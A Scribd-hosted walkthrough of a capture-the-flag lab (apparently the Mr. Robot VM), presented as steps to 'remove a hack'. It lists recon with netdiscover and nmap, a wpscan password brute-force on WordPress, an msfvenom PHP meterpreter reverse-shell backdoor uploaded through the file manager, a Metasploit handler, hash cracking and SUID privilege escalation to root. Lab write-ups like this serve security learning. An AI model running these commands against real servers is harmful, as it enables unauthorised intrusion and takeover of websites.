Scribd
Upload
81 views6 pages

Ethical Hacking

The document provides instructions for removing a hack from a compromised server. It outlines the following steps: 1. Install necessary tools like VirtualBox and Kali Linux ISO files. Configure the Kali Linux virtual machine network settings. 2. Perform footprinting on the hacked server to find its IP address and open ports using tools like netdiscover and nmap. 3. Scan the server URLs and download files using uniscan and wget to find clues like usernames and passwords. Use Hydra to crack passwords and gain access to the WordPress admin panel. 4. Enumerate the server further by creating a PHP backdoor using msfvenom and uploading it via the WordPress file manager. Use Metasp

Uploaded by

Bonni Al'Amin
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
81 views6 pages

Ethical Hacking

The document provides instructions for removing a hack from a compromised server. It outlines the following steps: 1. Install necessary tools like VirtualBox and Kali Linux ISO files. Configure the Kali Linux virtual machine network settings. 2. Perform footprinting on the hacked server to find its IP address and open ports using tools like netdiscover and nmap. 3. Scan the server URLs and download files using uniscan and wget to find clues like usernames and passwords. Use Hydra to crack passwords and gain access to the WordPress admin panel. 4. Enumerate the server further by creating a PHP backdoor using msfvenom and uploading it via the WordPress file manager. Use Metasp

Uploaded by

Bonni Al'Amin
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 6

Day 1

Study case find file a, b and c on the server because the hacker is put clue how to remove that
hack on the server

Tool need to be install


1. Virtual box
2. Iso kali linux
3. Iso server hacked

Server configuration and preparation:


1. Config kali linux server network adapter 1 to host-only adapter
2. Config kali linux server network adapter 2 to NAT
3. Start server kali linux and change ethernet 0 on network
- vim or nano /etc/network/interface
- change to be like this

4. Restart network with command “/etc/init.d/networking restart”


5. Make sure local IP is on eth 0 with command “ifconfig”. If local IP on eth 1 then you
should change network setting adapter 1 to be NAT and adapter 2 to become host-
only adapter on virtual box for server kali linux

Step 1 – Foot printing


1. Find the IP server hacked by scan network
-> netdiscover -r {your_ip_change last value to 0}/24
ex : netdiscover -r 192.168.56.0/24
-> try 1 by 1 the scanned IP on browser, to know which IP is webserver
for my case is 192.168.56.100

2. Find port open for that IP


-> nmap -sV {IP}
ex : nmap -sV 192.168.56.102
Step 2 Scanning
1. Scan all url active for that url
-> uniscan -u {url} -qwe
ex: uniscacn -u 192.168.56.102 -qwe

try 1 by 1 url and find info about user-agent like :

2. Download all list file user agent using wget


-> wget {url}
ex: wget 192.168.56.102/fsocity.disc | wget 192.168.56.102/key-1-of-3.txt

3. View all file using cat and try all password on file fsocity.disc using command wpscan
-> wpscan --update | wpscan --url {url} -U Elliot -P {file.disc}
ex : wpscan --url 192.168.56.102/wp-login -P fsocity.disc
Step 3 Enumeration
1. Login 192.168.56.102/wp-login with username=elliot and password=ER28-0652

2. Create flood file


-> /etc/init.d/postgresql start #run posgree first
-> msfvenom -p php/meterpreter_reverse_tcp LHOST={your_kalilinux_IP}
LPORT=${port} -f raw > {filename}.php
ex: msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.56.103 LPORT=4444 -f
raw > backdoor.php

3. Upload file backdoor.php into WP File Manager > wp-content > uploads
4. Open metasploit framework application
5. Create PAYLOAD on metasploit framework with command :
-> use exploit/multi/handler
-> set PAYLOAD php/meterpreter_reverse_tcp
-> set LHOST 192.168.56.103
-> set LPORT 4444
-> exploit -j -z
6. Open page 192.168.56.102 and make sure the page is always reloading
7. Check Metasploit and make sure you have 1 session registered

8. Open session registered with command


-> sessions -l #check list session
-> sessions -i 1 #use session 1 and try pwd and make sure response is look like picture

9. Go to home directory -> cd /home


10. Go to robot directory -> cd robot
11. cat file key-2-of-3.txt and file password.raw-md5

12. decrypt value file password.raw-md5 on crackstation.net


13. write -> shell
14. write -> python -c ‘import pty;pty.spawn(“/bin/bash”)’
15. become robot with command -> su robot #with password ->
abcdefghijklmnopqrstuvwxyz
16. find active sercvice with command
-> find / -perm -u=s -type f 2>/dev/null

17. write -> !sh


18. go to directory root -> cd /root
19. go to path /opt/bitnami/apps/wordpress/htdocs/
20. remove or rename file index.html and makesure page not being hacked anymore

You might also like